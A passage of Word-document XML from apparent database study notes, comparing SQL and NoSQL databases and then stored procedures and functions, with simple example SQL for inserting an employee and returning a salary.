    <w:p w14:paraId="3DE14AE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Real-time big data analytics, social media platforms, IoT applications, content management systems, and applications requiring fast reads and writes with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702F5F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Big Data, analytics, and event-driven architectures (OLAP - Online Analytical Processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2656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Schema Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1949D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01323E4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igid schema; changes to the schema require database migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D0C9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ew fields need to be added explicitly to the database, and changes to the data model require careful planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128663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65E6A9F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lexible or schema-less data models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1456D4"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structure can change as data evolves, which allows for more agile development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053EFE2"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Consistency Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26AE6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9FCB4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llows the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistency model to ensure strict consistency and data integrity during transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94376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371D6A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Often follows </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BASE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Basically Available, Soft state, Eventually consistent) model, focusing on availability and partition tolerance, allowing for temporary inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80A1F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9. Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D330D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C0672E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Performance can degrade when handling large-scale or distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7352A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t optimized for high-volume, low-latency workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39377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0F9212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signed for high performance and scalability. Optimized for high-volume, low-latency workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A29B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can handle massive data and traffic loads more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A01D9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0. Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AF8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 Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3662C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ySQL, PostgreSQL, MS SQL Server, Oracle, SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037803C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 Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E348A9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ongoDB, Cassandra, Redis, Couchbase, Neo4j, HBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B63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3427"/>
        <w:gridCol w:w="3754"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="496678B7" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A39969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6E53DD8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Relational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22664B6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oSQL (Non-relational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="3A072936" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B31F25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Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="462A3EE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uctured, tables with rows/columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DBD16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lexible, key-value, documents, graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="35625595" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC4D70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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D7B17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ertical Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76339ED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Horizontal Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="2D2E6EF6" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="187A12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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E15CC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CID-compliant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="454CC5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E-compliant, Eventual Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="0B244E86" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6963A4A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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB0EAA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QL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="542784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aries by database (JSON, APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6C15BC84" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE521E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13526FB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foreign keys, constraints)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C957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Less strict, flexible schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="06602EBD" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18EE15C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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C7517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OLTP, transactional systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="798BE1B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ig Data, real-time applications, analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="47525894" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32EDB94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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64EA214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consistency (ACID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="050C638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ventual consistency (BASE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6CABBE32" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D1D044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1D38E6F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lower with large data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0151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aster for large datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13AC821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C089FC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databases are ideal for applications requiring complex relationships, structured data, and strict consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E657D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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> databases are better suited for handling large-scale, unstructured or semi-structured data with flexible schema and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40765E78" w14:textId="2E1E822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3280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="257030CD" w14:textId="0E73B6B3" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="008349E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="802" w:name="_Toc197868016"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Stored Procedure and Function</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
    </w:p>
    <w:p w14:paraId="1E56CF26" w14:textId="15F496A3" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA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lies in their purpose, usage, and behavior within a database system. Here is a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355B728"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Purpose and Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A601E8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480B05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is a precompiled collection of one or more SQL statements that can be executed as a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA888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primarily used for performing operations like inserting, updating, or deleting data, and can execute a series of actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615535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perform multiple tasks (e.g., multiple queries or operations) and can return multiple result sets or no result set at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF27D3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often used for encapsulating business logic or handling complex operations in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB986C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174998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a piece of code that returns a single value or object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21326E9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are generally used for computing and returning values based on input parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA5B1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usually meant to return a result (scalar or table) based on specific inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1499C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expected to return a value and can be used in SQL queries, including SELECT, WHERE, and other expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D4C9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Return Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5179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73A8783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Does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> return a value directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119853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can return multiple result sets or perform operations that modify data, but typically does not return a value via a function signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B186CB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owever, it can return an output value through </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OUT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters or through a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>status code</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F8B3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265D663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lways returns a value, whether it's a scalar value (like an integer, string, etc.) or a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682761F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return value is usually used in SQL queries and calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6F31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Invocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C096E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0F29B8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nvoked using the CALL statement or by executing the procedure in a client application or a script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06453A7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not be used directly in SQL queries (like SELECT or WHERE clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E00E4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369115C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voked as part of a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., in SELECT, WHERE, HAVING clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD7E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used directly within SQL expressions, making it more versatile in query logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F98D2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Side Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8DE2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465E13B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modify the database state (e.g., insert, update, delete records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227462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has side effects, as it can change the state of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9F5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13FD624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are typically </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side-effect-free</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not modify database states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB02A9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designed to return a result without altering data (although there are exceptions in some databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EB2C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Transaction Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE5B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30864F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stored procedure can have </w:t>
      </w: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xml:space="preserve"> commands like BEGIN, COMMIT, and ROLLBACK to manage the transaction state explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14150A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063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function </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manage transaction control (i.e., it cannot explicitly commit or rollback a transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012894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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229E48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1C31DB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ored procedures can have input (IN), output (OUT), or input-output (INOUT) parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD55C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7C135F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typically only have </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>input parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and must return a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F5FA7"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7. Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C45624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0CD945F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Stored procedures can handle errors using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms like TRY...CATCH blocks, or using specific error codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E09D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60AC79A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can have basic error handling but are generally simpler and may not have advanced error-handling mechanisms like stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C337B5"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CFE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5F30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AddEmployee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68282C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name VARCHAR(50), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683143B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salary DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450025B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31B2B9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0736D4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Employee (name, salary) VALUES (emp_name, emp_salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57338F3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00AE03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using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C487B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AddEmployee('John Doe', 50000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC1E8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52EB82F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REATE FUNCTION GetEmployeeSalary (emp_id INT) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D50B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RETURNS DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD91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141A6D9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CLARE emp_salary DECIMAL(10, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0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salary INTO emp_salary FROM Employee WHERE id = emp_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B05E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ETURN emp_salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F313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ABEBAFA"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in a query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218000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ELECT GetEmployeeSalary(101);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC60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4344"/>
        <w:gridCol w:w="4004"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="5FB9987A" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D84D94"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4225015B"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ored Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20B1CAB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unction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="554768CC" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1B78A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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF093E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No direct return value (can use OUT parameters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E67F5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lways returns a value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="16D36862" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F8C3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31A3381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Perform complex operations, modify DB state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DAB7C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ute and return values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
